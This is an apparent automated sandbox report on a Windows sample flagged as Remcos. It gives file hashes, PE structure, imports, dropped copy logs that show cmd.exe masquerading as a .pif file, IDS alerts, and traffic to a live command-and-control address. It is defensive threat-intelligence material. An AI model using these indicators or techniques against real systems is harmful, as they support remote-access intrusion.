                                                        Process:C:\Windows\SysWOW64\colorcpl.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):962
                                                        Entropy (8bit):5.013130376969173
                                                        Encrypted:false
                                                        SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                        SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                        SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                        SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                        Malicious:false
                                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                        \Device\ConDrv

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):591
                                                        Entropy (8bit):4.670540606268435
                                                        Encrypted:false
                                                        SSDEEP:12:qKrbxTz9eSbZ7u0wxDDDDDDDDjCaY5q7aYAVurlTB8NGNSeKG:FrbxTz9p7u0wQakIaDuxt8NK
                                                        MD5:D689C79CBED9E601B490125F8288D039
                                                        SHA1:FAF4A4F613734157DC6B86F522F5205E9C6FEBC1
                                                        SHA-256:ECFBC5A1CDC3D4A555DF01B67098B12FF5C76857A5C4E9FEE7C1975DC22572B7
                                                        SHA-512:5717F86D2DA2D8D5F0CF12944C96746E3810471408A2C57D41E33B5696654708AE90CCC98D4617066846075C1D631AE6AA2B3BF45E04A26EF3B4EC868660BAF4
                                                        Malicious:false
                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\XjPA2pnUhC.exe...Destination File: C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x109c00 (1088512) (1 MB)....Total bytes written = 0x10a000 (1089536) (1 MB).......Operation completed successfully in 0.250 seconds.....

                                                        \Device\Null

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):564
                                                        Entropy (8bit):4.5615979709668295
                                                        Encrypted:false
                                                        SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNX:/pLExT6cp7u0wQakn4al4t8Nq
                                                        MD5:05A22680B7DECD8C26D4054C11805539
                                                        SHA1:51F76562E7B57B2CDF8484743FCD843E240736F2
                                                        SHA-256:A6C6F4DDA4F2AA5BFBB114583885897C7C6466CF72AB9EADBD0CCD2F2DE57E4A
                                                        SHA-512:869E46F222F753CE756DD5F46A76A25D517B0BDE88514BDA063DA9AF763911CE0A3062B687DAA71C4655A49BFA3FA7E0F5B8E3E1F5246B5F2A7DA21AB1BE430D
                                                        Malicious:false
                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.78 seconds.....

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.864877848429584
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.81%
                                                        • Windows Screen Saver (13104/52) 0.13%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        File name:XjPA2pnUhC.exe
                                                        File size:1'088'512 bytes
                                                        MD5:bbf710c83246092a538128620853d4fd
                                                        SHA1:95338f06c76178de31b5e8453f92c43f970ea9f9
                                                        SHA256:7ad64f279e3fa6a7d0ef2916240f1337584c5b5176fb56089771164f2905554f
                                                        SHA512:a609d92fe0d25e7db140c731af4b241d47cdaddfe735d9f7575c982ef790ab01d7f969038546e6054101b745e8c208f74e41faf246173ca0722c7b994cf94001
                                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                                        TLSH:E435ADA2D5808975E126063C5D06C3EA682F6D313B3CF8963AD9BBC97AF4C44B45E1D3
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                        File Icon

                                                        Icon Hash:30c082aa969f8c61

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x464824
                                                        Entrypoint Section:.itext
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                        DLL Characteristics:
                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:5c26047c5bc830c77e8237d6b4b0b716

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFF0h
                                                        mov eax, 0046352Ch
                                                        call 00007FF8C476FFE9h
                                                        mov eax, dword ptr [004F6128h]
                                                        mov eax, dword ptr [eax]
                                                        call 00007FF8C47BFEF5h
                                                        mov ecx, dword ptr [004F6230h]
                                                        mov eax, dword ptr [004F6128h]
                                                        mov eax, dword ptr [eax]
                                                        mov edx, dword ptr [00463288h]
                                                        call 00007FF8C47BFEF5h
                                                        mov eax, dword ptr [004F6128h]
                                                        mov eax, dword ptr [eax]
                                                        call 00007FF8C47BFF69h
                                                        call 00007FF8C476DE58h
                                                        lea eax, dword ptr [eax+00h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xfb0000x2886.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1070000xb800.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000x6c50.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xff0000x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xfb7880x648.idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x627b40x628000f32e850ef715d999396547333e20849False0.5216454830266497data6.541555656889583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .itext0x640000x86c0xa00539684b9bc23f946eff33c25d7c9698dFalse0.535546875data5.637001620348067IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0x650000x912d80x9140023bc3940b0cff067522cd1287415a080False0.4030160821858864data6.442332798220384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .bss0xf70000x36f80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata0xfb0000x28860x2a00492b3631cb998875f40004e587f945acFalse0.3117559523809524data5.10368978717298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .tls0xfe0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rdata0xff0000x180x200f9d59e0837e53d5c440d940847b16f0eFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1000000x6c500x6e005759cadc9e3a63e62689f080f461a17eFalse0.6497514204545455data6.686766299054601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x1070000xb8000xb8004431599255d60d10545599d628acd9a6False0.21658457880434784data4.259621358802321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_CURSOR0x107a880x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                        RT_CURSOR0x107bbc0x134dataEnglishUnited States0.4642857142857143
                                                        RT_CURSOR0x107cf00x134dataEnglishUnited States0.4805194805194805
                                                        RT_CURSOR0x107e240x134dataEnglishUnited States0.38311688311688313
                                                        RT_CURSOR0x107f580x134dataEnglishUnited States0.36038961038961037
                                                        RT_CURSOR0x10808c0x134dataEnglishUnited States0.4090909090909091
                                                        RT_CURSOR0x1081c00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                        RT_BITMAP0x1082f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                        RT_BITMAP0x1084c40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                        RT_BITMAP0x1086a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                        RT_BITMAP0x1088780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                        RT_BITMAP0x108a480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                        RT_BITMAP0x108c180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                        RT_BITMAP0x108de80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                        RT_BITMAP0x108fb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                        RT_BITMAP0x1091880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                        RT_BITMAP0x1093580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                        RT_BITMAP0x1095280xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                        RT_ICON0x1096100x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.13642857142857143
                                                        RT_DIALOG0x10fdf80x52data0.7682926829268293
                                                        RT_DIALOG0x10fe4c0x52data0.7560975609756098
                                                        RT_STRING0x10fea00x404Targa image data - Color 99 x 107 x 32 +68 +111 "z"0.4143968871595331
                                                        RT_STRING0x1102a40x1c8data0.5592105263157895
                                                        RT_STRING0x11046c0xccdata0.6764705882352942
                                                        RT_STRING0x1105380x114data0.6086956521739131
                                                        RT_STRING0x11064c0x350data0.43514150943396224
                                                        RT_STRING0x11099c0x3bcdata0.3817991631799163
                                                        RT_STRING0x110d580x370data0.4022727272727273
                                                        RT_STRING0x1110c80x3ccdata0.33539094650205764
                                                        RT_STRING0x1114940x214data0.49624060150375937
                                                        RT_STRING0x1116a80xccdata0.6274509803921569
                                                        RT_STRING0x1117740x194data0.5643564356435643
                                                        RT_STRING0x1119080x3c4data0.3288381742738589
                                                        RT_STRING0x111ccc0x338data0.42961165048543687
                                                        RT_STRING0x1120040x294data0.42424242424242425
                                                        RT_RCDATA0x1122980x10data1.5
                                                        RT_RCDATA0x1122a80x358data0.6869158878504673
                                                        RT_RCDATA0x1126000x156Delphi compiled form 'TForm1'0.7894736842105263
                                                        RT_GROUP_CURSOR0x1127580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                        RT_GROUP_CURSOR0x11276c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                        RT_GROUP_CURSOR0x1127800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                        RT_GROUP_CURSOR0x1127940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                        RT_GROUP_CURSOR0x1127a80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                        RT_GROUP_CURSOR0x1127bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                        RT_GROUP_CURSOR0x1127d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                        RT_GROUP_ICON0x1127e40x14data1.25

                                                        Imports

                                                        DLLImport
                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                        user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                        kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                        user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                        kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                        oleaut32.dllGetErrorInfo, SysFreeString
                                                        ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                        kernel32.dllSleep
                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                        comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-25T09:34:42.731337+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549706192.161.184.442468TCP
                                                        2024-09-25T09:34:43.932990+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549707178.237.33.5080TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 25, 2024 09:34:34.543014050 CEST49704443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.543051958 CEST44349704112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:34.543242931 CEST49704443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.543242931 CEST49704443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.543380022 CEST44349704112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:34.547012091 CEST49704443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.568825006 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.568864107 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:34.568924904 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.570169926 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:34.570179939 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:35.489897013 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:35.490026951 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:35.494180918 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:35.494191885 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:35.494429111 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:35.535327911 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:35.537086964 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:35.579395056 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.089123964 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.143326044 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.319142103 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.319161892 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.319194078 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.319207907 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.319221020 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.319339991 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.319339991 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.319359064 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.319403887 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.321079969 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.321088076 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.321106911 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.321165085 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.321171045 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.321193933 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.321213007 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.567298889 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567312956 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567343950 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567370892 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.567378998 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567413092 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.567429066 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.568690062 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.568706989 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.568747044 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.568752050 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.568788052 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.570485115 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.570502043 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.570568085 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.570571899 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.570604086 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.571451902 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.571469069 CEST44349705112.137.173.77192.168.2.5
